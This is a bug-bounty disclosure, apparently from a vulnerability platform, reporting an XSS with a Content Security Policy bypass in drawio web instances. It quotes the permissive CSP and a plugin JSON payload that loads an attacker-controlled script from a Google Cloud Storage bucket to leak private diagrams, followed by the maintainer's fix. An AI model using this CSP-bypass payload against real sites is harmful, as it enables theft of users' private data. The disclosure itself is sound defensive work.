XSS with CSP bypass on WEB instances in jgraph/drawio

Valid

Reported on

Sep 5th 2022


📝 Description

Drawio WEB instancesn allows https://storage.googleapis.com in CSP script-src, abusing the XSS found in this report, it is possible to bypass the CSP and leak private diagram content.

🕵️‍♂️ Proof of Concept

On the web application side, the javascript execution is protected by the following CSP:

...
script-src https://www.dropbox.com https://api.trello.com 'self' https://viewer.diagrams.net https://storage.googleapis.com https://apis.google.com https://*.pusher.com 'sha256-AVuOIxynOo/05KDLjyp0AoBE+Gt/KE1/vh2pS+yfqes=' 'sha256-r/ILW7KMSJxeo9EYqCTzZyCT0PZ9gHN1BLgki7vpR+A=' 'sha256-5DtSB5mj34lxcEf+HFWbBLEF49xxJaKnWGDWa/utwQA=' 'sha256-vS/MxlVD7nbY7AnV+0t1Ap338uF7vrcs7y23KjERhKc='
...

Because it allows you to load script from https://storage.googleapis.com which is the public URL for Google Cloud Bucket, it is possible to use it to execute our code.

{
  "plugins": [
    "https://storage.googleapis.com/bypass_csp/xss.js"
  ]
}

xss_web.png

Impact

An attacker could use it to access any user's confidential content.

We are processing your report and will contact the jgraph/drawio team within 24 hours. 18 days ago
David Benson validated this vulnerability 18 days ago
Mizu has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
David Benson confirmed that a fix has been merged on 59887e 18 days ago
The fix bounty has been dropped
David Benson
18 days ago

Maintainer


Thanks for report, entry has been removed from CSP.

to join this conversation